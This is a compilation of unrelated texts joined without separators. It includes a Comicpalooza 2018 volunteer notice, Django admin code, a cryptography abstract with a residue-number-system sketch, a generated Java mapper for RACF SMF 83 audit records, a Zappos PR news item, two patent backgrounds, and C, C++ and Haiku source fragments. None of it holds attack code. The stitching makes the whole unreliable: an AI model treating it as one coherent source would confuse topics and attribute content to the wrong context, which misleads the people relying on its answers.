Registration closes on May 20th. Volunteer details about parking, check-in, etc. were sent on Monday, May 21st between 9:00 pm and midnight. Comicpalooza returns to Houston's George R. Brown Convention Center, May 25-27, 2018. Comicpalooza is the largest multi-format pop culture con in Texas. In addition to the celebrity photo and autograph opportunities, the event features gaming, film festivals, a literary festival, children's activities, a Maker's Space, and lots and lots of cosplay. Are you interested in being part of something big that brings communities of fans together? As one of our volunteers, you will have the chance to see how a convention works from the inside, meet cool people, make new friends, and most notably, know that you have contributed to the entertainment and knowledge of our attendees! Key volunteer information you should know: ALL VOLUNTEER POSITIONS ARE UNPAID. REQUIREMENTS: Volunteers must be at least 18 years of age (by May 18, 2018) in order to participate. Volunteers are REQUIRED to undergo a background check and must sign a participation waiver upon the first shift. (PLEASE FILL OUT YOUR BACKGROUND CHECK WITH VERIFIED VOLUNTEERS. YOU ARE REDIRECTED AFTER YOU REGISTER. DO NOT SKIP THIS STEP.) Each volunteer must sign up for two shifts in order to be considered for the volunteer position. UNIFORM: All volunteers will receive a volunteer shirt. This must be worn at all times while working. Please pair it with jeans, khakis, or black pants and sneakers (sandals are not allowed). Cosplay is not allowed during your shift unless you are an approved member of the Comicpalooza Street Team. PARKING: Parking will be available for volunteers. The precise location of the volunteer parking lot will be communicated at a later date. HOTELS: Hotels are not provided for volunteers. Please Note: You are not able to participate in show events as a spectator while working a volunteer shift. Each position is essential for the success of this event. We will ask volunteers to leave Comicpalooza if they are unable to perform their duties or if any policies are violated. Thank you again for volunteering! For further information or assistance, please contact Monica Whitt at [email protected]
# -*- coding: utf-8 -*-
from django.contrib import admin

from coffeecups.models import (
    Take, TakeForm, Throw, ThrowForm, CupPolicy, CupPolicyForm)


class TakeAdmin(admin.ModelAdmin):
    # Fixed: a custom ModelForm is attached to a ModelAdmin via `form`;
    # the original assigned the form classes to `model`, which ModelAdmin
    # does not use that way.
    form = TakeForm
    list_display = ('user', 'date',)
    search_fields = ('user__username',)


class ThrowAdmin(admin.ModelAdmin):
    form = ThrowForm
    list_display = ('user', 'date',)
    search_fields = ('user__username',)


class CupPolicyAdmin(admin.ModelAdmin):
    form = CupPolicyForm
    list_display = (
        'name', 'comment', 'no_takes', 'take_of_the_day',
        'take_malus', 'throw',
    )
    search_fields = (
        'name', 'comment', 'users__username', 'take_of_the_day',
        'take_malus', 'throw',
    )


admin.site.register(Take, TakeAdmin)
admin.site.register(Throw, ThrowAdmin)
admin.site.register(CupPolicy, CupPolicyAdmin)
Essentials of Hand Surgery This convenient, portable manual provides all the essential information that surgeons and physicians need, including details on hand anatomy, thorough instructions for physical examination of the hand, and step-by-step guidelines for the diagnosis and treatment of all disorders and injuries. The text is written in an easy-to-follow style and illustrated with 172 drawings, photographs, and radiographs.
A novel approach to cryptography using the Residue Number System. In this research, we aim to encrypt secret information with a high level of security. In our approach, the Residue Number System (RNS) is used for encryption, while Huffman coding and the Lempel-Ziv-Welch (LZW) compression algorithm are used to compress the information. In the embedding process, the Data Encryption Standard (DES) algorithm is used to achieve high security.
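The abstract gives no implementation, but the core RNS idea it relies on, representing an integer by its residues modulo a set of pairwise-coprime moduli and recovering it with the Chinese Remainder Theorem, can be sketched as follows. This is a minimal illustration only; the moduli set is an assumption, not one taken from the paper.

from functools import reduce

MODULI = (251, 253, 255, 256)  # pairwise-coprime moduli (illustrative choice)

def rns_encode(x, moduli=MODULI):
    """Represent integer x by its residues modulo each modulus."""
    return tuple(x % m for m in moduli)

def rns_decode(residues, moduli=MODULI):
    """Recover x from its residues via the Chinese Remainder Theorem."""
    M = reduce(lambda a, b: a * b, moduli)
    x = 0
    for r, m in zip(residues, moduli):
        Mi = M // m
        # pow(Mi, -1, m) is the modular inverse (Python 3.8+)
        x += r * Mi * pow(Mi, -1, m)
    return x % M

assert rns_decode(rns_encode(123456789)) == 123456789

Any value below the product of the moduli round-trips exactly, which is what makes the residue tuple usable as an encrypted or obfuscated representation of the plaintext.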
/**
 * Base class to map the fixed portion of SMF record 83 (RACF Security information).
 * This code (excluding these notes) was generated using
 * <code>com.ibm.jzos.recordgen.asm.RecordClassGenerator</code> using the following JCL:
 *
 * <pre><code>
 * //ASSEMBLE EXEC ASMAC,PARM='ADATA,LIST,NOTERM,NODECK,NOOBJECT'
 * //C.SYSIN DD *
 *          IFASMFR 83
 *          END
 * //C.SYSADATA DD DSN=&&ADATA,DISP=(NEW,PASS),
 * //             SPACE=(CYL,(3,1))
 * //*
 * //JAVA EXEC PROC=EXJZOSVM,VERSION='50'
 * //MAINARGS DD *
 * com.ibm.jzos.recordgen.asm.RecordClassGenerator section=SMFRCD83 bufoffset=false package=com.ibm.jzos.sample.fields class=Smf83BaseRecord
 * //SYSADATA DD DSN=&&ADATA,DISP=(OLD,DELETE)
 * //STDOUT DD PATH='/home/user/Smf83BaseRecord.java',
 * //          PATHOPTS=(OWRONLY,OCREAT),
 * //          PATHMODE=SIRWXU
 * //STDENV DD *
 * ...
 * </code></pre>
 *
 * @see Smf83Record Smf83Record for a hand-coded subclass of this class that glues
 *      together the components of a SMF 83 record
 * @since 2.1.0
 */
public class Smf83BaseRecord {

    protected static AssemblerDatatypeFactory factory = new AssemblerDatatypeFactory();

    /**
     * IFASMFR 83 <br/>
     * %IFABGN1: ; <br/>
     * SMF RECORD FIXED HEADER SECTION @D6A <br/>
     * SMFRCD83 DSECT FIXED HEADER SECTION @M5A
     */
    public static int SMFRCD83 = factory.getOffset();

    /** DS 0F ALIGN TO FULL WORD BOUNDARY @M5A */
    static { factory.pushOffset(); }
    static { factory.getBinaryAsIntField(4, true); }
    static { factory.popOffset(); }

    /** SMF83LEN DS BL2 RECORD LENGTH @M5A */
    protected static BinaryAsIntField SMF83LEN = factory.getBinaryAsIntField(2, false);

    /** SMF83SEG DS BL2 SEGMENT DESCRIPTOR @M5A */
    protected static BinaryAsIntField SMF83SEG = factory.getBinaryAsIntField(2, false);

    /** SMF83FLG DS BL1 SYSTEM INDICATOR @M5A */
    protected static BinaryAsIntField SMF83FLG = factory.getBinaryAsIntField(1, false);

    /**
     * BIT MEANING WHEN SET @M5A <br/>
     * BIT 1 SUBTYPE UTILIZED INDICATOR @M5A <br/>
     * SMF83RTY DS BL1 RECORD TYPE(83) @M5A
     */
    protected static BinaryAsIntField SMF83RTY = factory.getBinaryAsIntField(1, false);

    /** SMF83TME DS BL4 TOD FROM TIME MACRO - BINARY @M5A */
    protected static BinaryAsLongField SMF83TME = factory.getBinaryAsLongField(4, false);

    /** SMF83DTE DS PL4 DATE FROM TIME MACRO @M5A */
    protected static PackedDecimalAsIntField SMF83DTE = factory.getPackedDecimalAsIntField(4, true);

    /** SMF83SID DS CL4 SYSTEM IDENTIFICATION @M5A */
    protected static StringField SMF83SID = factory.getStringField(4, true);

    /** SMF83DF1 DS BL34 THE FOLLOWING FIELDS ARE DIFFERENT FROM @D6C */
    protected static ByteArrayField SMF83DF1 = factory.getByteArrayField(34);

    /**
     * SMF TYPE 80 RECORD: @M5A <br/>
     * ORG SMF83DF1 @D6C <br/>
     * SMF83SSI DS CL4 SUBSYSTEM IDENTIFICATION - RACF @D6A
     */
    static { factory.incrementOffset(-34); }
    protected static StringField SMF83SSI = factory.getStringField(4, true);

    /** SMF83TYP DS BL2 RECORD SUBTYPE =1 @M5A */
    protected static BinaryAsIntField SMF83TYP = factory.getBinaryAsIntField(2, false);

    /**
     * SELF DEFINING SECTION @D6A <br/>
     * SMF83SDS DS BL28 SELF DEFINING SECTION @D6A
     */
    protected static ByteArrayField SMF83SDS = factory.getByteArrayField(28);

    /**
     * ORG SMF83SDS @D6A <br/>
     * SMF83TRP DS BL2 NUMBER OF TRIPLETS @D6A
     */
    static { factory.incrementOffset(-28); }
    protected static BinaryAsIntField SMF83TRP = factory.getBinaryAsIntField(2, false);

    /** SMF83XXX DS BL2 RESERVED @D6A */
    protected static BinaryAsIntField SMF83XXX = factory.getBinaryAsIntField(2, false);

    /** SMF83OPD DS BL4 OFFSET TO PRODUCT SECTION @D6A */
    protected static BinaryAsLongField SMF83OPD = factory.getBinaryAsLongField(4, false);

    /** SMF83LPD DS BL2 LENGTH OF PRODUCT SECTION @D6A */
    protected static BinaryAsIntField SMF83LPD = factory.getBinaryAsIntField(2, false);

    /** SMF83NPD DS BL2 NUMBER OF PRODUCT SECTIONS @D6A */
    protected static BinaryAsIntField SMF83NPD = factory.getBinaryAsIntField(2, false);

    /** SMF83OD1 DS BL4 OFFSET TO SECURITY SECTION @D6A */
    protected static BinaryAsLongField SMF83OD1 = factory.getBinaryAsLongField(4, false);

    /** SMF83LD1 DS BL2 LENGTH OF SECURITY SECTION @D6A */
    protected static BinaryAsIntField SMF83LD1 = factory.getBinaryAsIntField(2, false);

    /** SMF83ND1 DS BL2 NUMBER OF SECURITY SECTIONS @D6A */
    protected static BinaryAsIntField SMF83ND1 = factory.getBinaryAsIntField(2, false);

    /** SMF83OD2 DS BL4 OFFSET TO RELOCATE SECTION @D6A */
    protected static BinaryAsLongField SMF83OD2 = factory.getBinaryAsLongField(4, false);

    /** SMF83LD2 DS BL2 LENGTH OF RELOCATE SECTION @D6A */
    protected static BinaryAsIntField SMF83LD2 = factory.getBinaryAsIntField(2, false);

    /** SMF83ND2 DS BL2 NUMBER OF RELOCATE SECTIONS @D6A */
    protected static BinaryAsIntField SMF83ND2 = factory.getBinaryAsIntField(2, false);

    protected byte[] bytes;

    // Instance variables used to cache field values
    private Integer smf83len;
    private Integer smf83seg;
    private Integer smf83flg;
    private Integer smf83rty;
    private Long smf83tme;
    private Integer smf83dte;
    private String smf83sid;
    private byte[] smf83df1;
    private String smf83ssi;
    private Integer smf83typ;
    private byte[] smf83sds;
    private Integer smf83trp;
    private Integer smf83xxx;
    private Long smf83opd;
    private Integer smf83lpd;
    private Integer smf83npd;
    private Long smf83od1;
    private Integer smf83ld1;
    private Integer smf83nd1;
    private Long smf83od2;
    private Integer smf83ld2;
    private Integer smf83nd2;

    public Smf83BaseRecord(byte[] buffer) {
        this.bytes = buffer;
    }

    public int getSmf83len() {
        if (smf83len == null) { smf83len = new Integer(SMF83LEN.getInt(bytes)); }
        return smf83len.intValue();
    }

    public void setSmf83len(int smf83len) {
        if (SMF83LEN.equals(this.smf83len, smf83len)) return;
        SMF83LEN.putInt(smf83len, bytes);
        this.smf83len = new Integer(smf83len);
    }

    public int getSmf83seg() {
        if (smf83seg == null) { smf83seg = new Integer(SMF83SEG.getInt(bytes)); }
        return smf83seg.intValue();
    }

    public void setSmf83seg(int smf83seg) {
        if (SMF83SEG.equals(this.smf83seg, smf83seg)) return;
        SMF83SEG.putInt(smf83seg, bytes);
        this.smf83seg = new Integer(smf83seg);
    }

    public int getSmf83flg() {
        if (smf83flg == null) { smf83flg = new Integer(SMF83FLG.getInt(bytes)); }
        return smf83flg.intValue();
    }

    public void setSmf83flg(int smf83flg) {
        if (SMF83FLG.equals(this.smf83flg, smf83flg)) return;
        SMF83FLG.putInt(smf83flg, bytes);
        this.smf83flg = new Integer(smf83flg);
    }

    public int getSmf83rty() {
        if (smf83rty == null) { smf83rty = new Integer(SMF83RTY.getInt(bytes)); }
        return smf83rty.intValue();
    }

    public void setSmf83rty(int smf83rty) {
        if (SMF83RTY.equals(this.smf83rty, smf83rty)) return;
        SMF83RTY.putInt(smf83rty, bytes);
        this.smf83rty = new Integer(smf83rty);
    }

    public long getSmf83tme() {
        if (smf83tme == null) { smf83tme = new Long(SMF83TME.getLong(bytes)); }
        return smf83tme.longValue();
    }

    public void setSmf83tme(long smf83tme) {
        if (SMF83TME.equals(this.smf83tme, smf83tme)) return;
        SMF83TME.putLong(smf83tme, bytes);
        this.smf83tme = new Long(smf83tme);
    }

    public int getSmf83dte() {
        if (smf83dte == null) { smf83dte = new Integer(SMF83DTE.getInt(bytes)); }
        return smf83dte.intValue();
    }

    public void setSmf83dte(int smf83dte) {
        if (SMF83DTE.equals(this.smf83dte, smf83dte)) return;
        SMF83DTE.putInt(smf83dte, bytes);
        this.smf83dte = new Integer(smf83dte);
    }

    public String getSmf83sid() {
        if (smf83sid == null) { smf83sid = SMF83SID.getString(bytes); }
        return smf83sid;
    }

    public void setSmf83sid(String smf83sid) {
        if (SMF83SID.equals(this.smf83sid, smf83sid)) return;
        SMF83SID.putString(smf83sid, bytes);
        this.smf83sid = smf83sid;
    }

    public byte[] getSmf83df1() {
        if (smf83df1 == null) { smf83df1 = SMF83DF1.getByteArray(bytes); }
        return smf83df1;
    }

    public void setSmf83df1(byte[] smf83df1) {
        if (SMF83DF1.equals(this.smf83df1, smf83df1)) return;
        SMF83DF1.putByteArray(smf83df1, bytes);
        this.smf83df1 = smf83df1;
    }

    public String getSmf83ssi() {
        if (smf83ssi == null) { smf83ssi = SMF83SSI.getString(bytes); }
        return smf83ssi;
    }

    public void setSmf83ssi(String smf83ssi) {
        if (SMF83SSI.equals(this.smf83ssi, smf83ssi)) return;
        SMF83SSI.putString(smf83ssi, bytes);
        this.smf83ssi = smf83ssi;
    }

    public int getSmf83typ() {
        if (smf83typ == null) { smf83typ = new Integer(SMF83TYP.getInt(bytes)); }
        return smf83typ.intValue();
    }

    public void setSmf83typ(int smf83typ) {
        if (SMF83TYP.equals(this.smf83typ, smf83typ)) return;
        SMF83TYP.putInt(smf83typ, bytes);
        this.smf83typ = new Integer(smf83typ);
    }

    public byte[] getSmf83sds() {
        if (smf83sds == null) { smf83sds = SMF83SDS.getByteArray(bytes); }
        return smf83sds;
    }

    public void setSmf83sds(byte[] smf83sds) {
        if (SMF83SDS.equals(this.smf83sds, smf83sds)) return;
        SMF83SDS.putByteArray(smf83sds, bytes);
        this.smf83sds = smf83sds;
    }

    public int getSmf83trp() {
        if (smf83trp == null) { smf83trp = new Integer(SMF83TRP.getInt(bytes)); }
        return smf83trp.intValue();
    }

    public void setSmf83trp(int smf83trp) {
        if (SMF83TRP.equals(this.smf83trp, smf83trp)) return;
        SMF83TRP.putInt(smf83trp, bytes);
        this.smf83trp = new Integer(smf83trp);
    }

    public int getSmf83xxx() {
        if (smf83xxx == null) { smf83xxx = new Integer(SMF83XXX.getInt(bytes)); }
        return smf83xxx.intValue();
    }

    public void setSmf83xxx(int smf83xxx) {
        if (SMF83XXX.equals(this.smf83xxx, smf83xxx)) return;
        SMF83XXX.putInt(smf83xxx, bytes);
        this.smf83xxx = new Integer(smf83xxx);
    }

    public long getSmf83opd() {
        if (smf83opd == null) { smf83opd = new Long(SMF83OPD.getLong(bytes)); }
        return smf83opd.longValue();
    }

    public void setSmf83opd(long smf83opd) {
        if (SMF83OPD.equals(this.smf83opd, smf83opd)) return;
        SMF83OPD.putLong(smf83opd, bytes);
        this.smf83opd = new Long(smf83opd);
    }

    public int getSmf83lpd() {
        if (smf83lpd == null) { smf83lpd = new Integer(SMF83LPD.getInt(bytes)); }
        return smf83lpd.intValue();
    }

    public void setSmf83lpd(int smf83lpd) {
        if (SMF83LPD.equals(this.smf83lpd, smf83lpd)) return;
        SMF83LPD.putInt(smf83lpd, bytes);
        this.smf83lpd = new Integer(smf83lpd);
    }

    public int getSmf83npd() {
        if (smf83npd == null) { smf83npd = new Integer(SMF83NPD.getInt(bytes)); }
        return smf83npd.intValue();
    }

    public void setSmf83npd(int smf83npd) {
        if (SMF83NPD.equals(this.smf83npd, smf83npd)) return;
        SMF83NPD.putInt(smf83npd, bytes);
        this.smf83npd = new Integer(smf83npd);
    }

    public long getSmf83od1() {
        if (smf83od1 == null) { smf83od1 = new Long(SMF83OD1.getLong(bytes)); }
        return smf83od1.longValue();
    }

    public void setSmf83od1(long smf83od1) {
        if (SMF83OD1.equals(this.smf83od1, smf83od1)) return;
        SMF83OD1.putLong(smf83od1, bytes);
        this.smf83od1 = new Long(smf83od1);
    }

    public int getSmf83ld1() {
        if (smf83ld1 == null) { smf83ld1 = new Integer(SMF83LD1.getInt(bytes)); }
        return smf83ld1.intValue();
    }

    public void setSmf83ld1(int smf83ld1) {
        if (SMF83LD1.equals(this.smf83ld1, smf83ld1)) return;
        SMF83LD1.putInt(smf83ld1, bytes);
        this.smf83ld1 = new Integer(smf83ld1);
    }

    public int getSmf83nd1() {
        if (smf83nd1 == null) { smf83nd1 = new Integer(SMF83ND1.getInt(bytes)); }
        return smf83nd1.intValue();
    }

    public void setSmf83nd1(int smf83nd1) {
        if (SMF83ND1.equals(this.smf83nd1, smf83nd1)) return;
        SMF83ND1.putInt(smf83nd1, bytes);
        this.smf83nd1 = new Integer(smf83nd1);
    }

    public long getSmf83od2() {
        if (smf83od2 == null) { smf83od2 = new Long(SMF83OD2.getLong(bytes)); }
        return smf83od2.longValue();
    }

    public void setSmf83od2(long smf83od2) {
        if (SMF83OD2.equals(this.smf83od2, smf83od2)) return;
        SMF83OD2.putLong(smf83od2, bytes);
        this.smf83od2 = new Long(smf83od2);
    }

    public int getSmf83ld2() {
        if (smf83ld2 == null) { smf83ld2 = new Integer(SMF83LD2.getInt(bytes)); }
        return smf83ld2.intValue();
    }

    public void setSmf83ld2(int smf83ld2) {
        if (SMF83LD2.equals(this.smf83ld2, smf83ld2)) return;
        SMF83LD2.putInt(smf83ld2, bytes);
        this.smf83ld2 = new Integer(smf83ld2);
    }

    public int getSmf83nd2() {
        if (smf83nd2 == null) { smf83nd2 = new Integer(SMF83ND2.getInt(bytes)); }
        return smf83nd2.intValue();
    }

    public void setSmf83nd2(int smf83nd2) {
        if (SMF83ND2.equals(this.smf83nd2, smf83nd2)) return;
        SMF83ND2.putInt(smf83nd2, bytes);
        this.smf83nd2 = new Integer(smf83nd2);
    }
}
Online shoe and apparel retailer Zappos has expanded the duties of Mullen, its creative and media buying firm since 2009, to cover PR. It previously worked with Kel & Partners. LAS VEGAS: Online shoe and apparel retailer Zappos has selected Mullen’s PR unit to serve as its communications AOR following a competitive review. The firm has worked with Zappos on advertising and media buying since 2009. Mullen’s PR team consists of 35 staffers, who also work on experiential and social media efforts, said Kelly Burke, SVP and group account director at Mullen. Catherine Cook, PR manager at Zappos, said the Mullen team "is bringing a wealth of knowledge to Zappos.com in the fashion, influencer, and experiential spaces, and their passion and enthusiasm for the brand is unparalleled." She added in an emailed statement that Mullen’s team "embodies the spirit and core values of Zappos." Prior to bringing on Mullen, Zappos worked with Kel & Partners, which had served as the brand’s AOR since 2008. Representatives from Kel & Partners did not respond to inquiries seeking comment. Mullen, which was hired earlier this month, is working on the "four Cs" for Zappos: clothing, community, customer service, and culture, explained Burke. For the clothing-focused part of the account, the agency, with a core team of six staffers on the business, will focus on increasing awareness of the breadth and depth of Zappos’ product offerings. The firm will work to engage traditional media outlets, as well as the "big hitters in fashion," said Burke. In addition to winning the PR account in March, Mullen has been tasked with handling experiential projects for the brand in recent months, such as a carousel baggage-claim game the day before Thanksgiving of last year at Houston’s George Bush Intercontinental Airport. Burke said the firm hopes to continue growing that part of the account. Budget information for the business was not disclosed. Burke noted that communications, which is the "unsung hero of Mullen to a certain degree," has long been a practice at the firm. Other PR clients include real-estate company Century 21, Olympus, Capital One, JetBlue, and MassMutual. Zappos issued an RFP for its PR account in May 2012, only to pull it four months later and stick with Kel & Partners instead. Before canceling the review, Zappos had looked for a full-service agency to position it as a "one-stop-shop online retailer that offers a range of products from footwear to handbags."
This invention relates to transformers, and more particularly to transformers having a dry-type construction with solid insulation. A transformer with a dry-type construction includes at least one coil mounted to a core so as to form a core/coil assembly. The core is ferromagnetic and is often comprised of a stack of metal plates or laminations composed of grain-oriented silicon steel. The core/coil assembly is encapsulated in a solid insulating material to insulate and seal the core/coil assembly from the outside environment. The solid insulating material that is used to encapsulate the core/coil assembly of a dry-type transformer is typically a thermoset polymer, which is a polymer material that cures, through the addition of energy, to a stronger form. The energy may be supplied in the form of heat (generally above 200 degrees Celsius), a chemical reaction, or irradiation. A thermoset resin is usually liquid or malleable prior to curing, which permits the resin to be molded. When a thermoset resin cures, molecules in the resin cross-link, which causes the resin to harden. After curing, a thermoset resin cannot be remelted or remolded without destroying its original characteristics. Thermoset resins include epoxies, melamines, phenolics and ureas. When a thermoset resin cures, the resin typically shrinks. Because the resin surrounds the core/coil assembly, the shrinking thermoset resin exerts high mechanical stresses and strains on the core of the transformer. These stresses and strains distort the oriented grains of the core and increase resistance to the magnetic flux flow in the laminations. This distortion and increased resistance result in higher core loss, which causes the sensitivity of the transformer to decrease and diminishes the accuracy of the transformer. In addition, when the thermoset resin shrinks around edges and protrusions, cracks may form in the thermoset resin. The cracks may grow over time and compromise the insulating properties of the thermoset resin. As a result, partial discharges may occur. A partial discharge is an electrical spark that bridges the thermoset resin between portions of the core/coil assembly. A partial discharge does not necessarily occur at the core/coil assembly; it can occur anywhere the electric field strength exceeds the breakdown strength of the thermoset resin. Partial discharges contribute to the deterioration of the thermoset resin, which shortens the useful life of the transformer. One approach for protecting the core of a transformer and preventing partial discharges has been disclosed in U.S. patent application Ser. No. 11/518,682, filed on Sep. 11, 2006, entitled “DRY-TYPE TRANSFORMER WITH SHIELDED CORE/COIL ASSEMBLY AND METHOD OF MANUFACTURING THE SAME”, which is assigned to the assignee of the present invention, ABB Technology AG, and which is incorporated herein by reference. In the '682 patent application, a core and coil assembly of a transformer are disposed inside a protective polymer case having an exterior surface that is at least partially covered with a conductive coating. The present invention is directed toward such a protective polymer case having an improved construction.
/*
 * Copyright 2011, <NAME>, <EMAIL>.
 * Distributed under the terms of the MIT License.
 */
#ifndef NAME_INDEX_H
#define NAME_INDEX_H

#include "Index.h"
#include "NodeListener.h"

template<typename Policy> class GenericIndexIterator;

class NameIndex : public Index, private NodeListener {
public:
    NameIndex();
    virtual ~NameIndex();

    status_t Init(Volume* volume);

    virtual int32 CountEntries() const;

private:
    virtual void NodeAdded(Node* node);
    virtual void NodeRemoved(Node* node);
    virtual void NodeChanged(Node* node, uint32 statFields,
        const OldNodeAttributes& oldAttributes);

protected:
    virtual AbstractIndexIterator* InternalGetIterator();
    virtual AbstractIndexIterator* InternalFind(const void* key,
        size_t length);

private:
    class EntryTree;
    struct IteratorPolicy;
    struct Iterator;

    friend class IteratorPolicy;

    void _UpdateLiveQueries(Node* entry, const char* oldName,
        const char* newName);

private:
    EntryTree* fEntries;
};

#endif // NAME_INDEX_H
1. Technical Field The present invention relates generally to computer systems, and more specifically to a debugger suitable for use with rule-based expert systems. 2. Description of the Related Art Expert systems are computer programs which attempt to mimic expert problem-solving behavior. They are typically used to draw conclusions from a set of observations, or to propose and confirm hypotheses in order to achieve a desired goal. These systems employ rules as their basic components and manipulate the rules using a control procedure, such as forward-chaining or backward-chaining, in order to solve a particular problem. Rules are statements of the form "IF condition, THEN action, ELSE action." The condition states one or more facts that must be true for the rule to be applied. The action parts state which actions should be taken when the rule is true or false. Actions for the true and false cases are found in the THEN and ELSE parts, respectively. The condition and actions frequently refer to variables which temporarily store information about the state of the problem solution. Thus, the action in one rule might assign a value to a variable which is used in the condition or action of another rule. While each rule is considered an independent unit and is entered and processed in a declarative manner, the sharing of variables between rules allows them to interact. In forward-chaining systems, the effects of rule firings are propagated by repeatedly checking to see whether rule conditions are true. A set of initial variable values is matched against the rule conditions. As rule conditions become true, the appropriate rule actions are executed and the resulting variable values are matched. This match-execution cycle is repeated until certain stopping conditions are met or until no rule actions can be executed. In backward-chaining systems, the rules are used to establish values for goal variables. A set of variables is initially established as goals. Rules whose actions assign values to these variables are viewed as sources. The conditions of these rules may contain variables. If these variables have values, the rules may be evaluated to obtain values for the goals. If these variables do not have values, they are established as subgoals and additional rules are used as sources. This procedure continues until conditions can be evaluated and the effects of the rule actions ripple back through the chain of source rules, eventually assigning values to the original goal variables. Many inference engines allow non-rule sources to be used. Frequently, function calls, database accesses, or user queries may be used to acquire a value for a variable. However, these sources do not contribute to the propagation of values in forward-chaining or to the pursuit of goals and subgoals in backward-chaining. Thus, the use of such sources to supply values for variables does not affect the interactions of rules in an expert system. The fact that the rules may be entered in a declarative fashion and then executed in a manner which depends on the nature of the problem and data in a knowledge base means that the expert system programmer does not normally need to specify procedural interactions among rules. However, when the system does not display the desired behavior, it is often very difficult to determine exactly where the execution went awry. In typical expert systems, explanation facilities are provided in order to let the user view a trace of the steps which the expert system used to arrive at its conclusion.
However, these explanations do not suffice to easily identify the problem in many cases, and are generally available only when the system needs the user to supply values or after the program has completed execution. Intermediate results of execution activities are frequently unavailable. Typical prior art expert system debuggers include Knowledge Tool, a product available from IBM, and TEIRESIAS. Knowledge Tool uses forward-chaining and allows a user to single-step through the inferencing process. The debugger halts at the end of the match-execution cycle and presents limited state information. Some static information is available before and after system execution. TEIRESIAS, described in detail in Part 2 of KNOWLEDGE-BASED SYSTEMS IN ARTIFICIAL INTELLIGENCE, R. Davis and D. Lenat, McGraw-Hill, 1982, applies to backward-chaining systems. Limited state information can be obtained when execution halts while awaiting input of a variable value from a user. If a variable is changed, execution is restarted from the beginning. Similar problems exist in conventional, procedural programming environments. Since the programs are written as explicit procedures, the flow of execution is generally obvious. However, the effects of variable values and intermediate results are not visible during execution. Conventional debuggers address this problem by allowing the user to specify breakpoints, which are points at which execution is halted and the user is allowed to investigate variable values and execution information. Neither of the expert system debuggers mentioned above allows breakpoints to be defined based upon various conditions, such as variable values and rule firings, which occur during execution of an expert system. Neither is suitable for use with both forward-chaining and backward-chaining inference engines. Both utilize only a few simple debugging techniques typically found in conventional debuggers. Since the flow of execution in a declarative, rule-based expert system is not generally known in advance, and may not even be deterministic, the approaches used in conventional debuggers are not adequate for use with expert system programs. It would be desirable for a debugger suitable for use with rule-based expert systems to provide breakpoint and user information facilities which clarify the operation of such expert systems and simplify the user's task of correcting programming errors. It would be further desirable to provide a method for an expert system debugger to perform a consistency check whenever a rule or variable is changed by a user.
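The forward-chaining match-execution cycle described above is easy to illustrate concretely. The following is a minimal toy sketch, not the patent's implementation; the rule representation (condition/action functions over a shared variable store) is an assumption chosen for brevity.

# Minimal forward-chaining sketch: rules are (condition, action) pairs over a
# shared variable store; the match-execute cycle repeats until no rule fires.
def forward_chain(rules, facts, max_cycles=100):
    for _ in range(max_cycles):
        fired = False
        for condition, action in rules:
            if condition(facts):
                before = dict(facts)
                action(facts)          # may assign new variable values
                if facts != before:    # only count firings that change state
                    fired = True
        if not fired:                  # quiescent: no rule action can execute
            break
    return facts

# Example: two interacting rules sharing the variable store.
rules = [
    (lambda f: f.get("temp", 0) > 100, lambda f: f.update(state="boiling")),
    (lambda f: f.get("state") == "boiling", lambda f: f.update(alarm=True)),
]
print(forward_chain(rules, {"temp": 120}))
# -> {'temp': 120, 'state': 'boiling', 'alarm': True}

A debugger of the kind the patent motivates would hook into this loop, halting when a watched variable changes or a particular rule fires, rather than only at the end of execution.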
// Awkward Engine/Code/Engine/GameObject.cpp
#include <typeinfo>
#include "GameObject.h"

GameObject::GameObject()
{
    transform = new Transform(this);
}

GameObject::~GameObject()
{
    delete transform;
    for (Component* comp : components)
        delete comp;
}

void GameObject::addComponent(Component* comp)
{
    if (comp == nullptr)
        return;

    // Check whether the component's Type is set up
#ifdef _DEBUG
    if (comp->getID() == "")
        printf("WARNING: Added Component without ID to GameObject! GetComponent won't work now!");
#endif

    // If the Component was attached to another GameObject before, remove it.
    if (comp->gameObject != nullptr)
        comp->gameObject->removeComponent(comp);

    comp->gameObject = this;
    components.push_back(comp);
}

void GameObject::removeComponent(Component* comp)
{
    if (comp == nullptr)
        return;

    components.remove(comp);
    comp->gameObject = nullptr;
}

void GameObject::removeAllComponents()
{
    // Fixed: the original erased elements from `components` while
    // range-iterating over it, which is undefined behavior.
    // Delete everything first, then clear the list.
    for (Component* comp : components)
        delete comp;
    components.clear();
}

void GameObject::Update()
{
    if (!enabled)
        return;

    for (Component* comp : components)
        comp->Update();
}

Component* GameObject::getComponent(std::string ID)
{
    for (Component* comp : components)
    {
        if (componentHash(comp->getID()) == componentHash(ID))
            return comp;
    }
    return nullptr;
}

std::vector<Component*> GameObject::getComponents(std::string ID)
{
    std::vector<Component*> result;
    for (Component* comp : components)
    {
        if (comp->getID().compare(ID) == 0)
            result.push_back(comp);
    }
    return result;
}

std::vector<Component*> GameObject::getComponentsInChildren(std::string ID)
{
    std::vector<Component*> result;
    for (Transform* trans : transform->GetChildren())
    {
        std::vector<Component*> tempVector = trans->getGameObject()->getComponents(ID);
        result.insert(result.end(), tempVector.begin(), tempVector.end());
    }
    return result;
}
/**
 * @brief Poll the message queue for incoming IPC messages.
 */
int iface_process_ipc_msgs(void)
{
    int ret = 0;
    int n, rv;
    fd_set readfds;
    struct timeval tv;

    FD_ZERO(&readfds);
    FD_SET(my_sock.sock_fd, &readfds);

    n = my_sock.sock_fd + 1;

#ifdef NGCORE_SHRINK
    tv.tv_sec = 1;
    tv.tv_usec = 500000;
#else
    tv.tv_sec = 10;
    tv.tv_usec = 500000;
#endif

    rv = select(n, &readfds, NULL, NULL, &tv);
    if (rv == -1) {
        perror("select");
    } else if (rv > 0) {
        if (FD_ISSET(my_sock.sock_fd, &readfds))
            ret = iface_remove_que(COMM_SOCKET);
    }

    return ret;
}
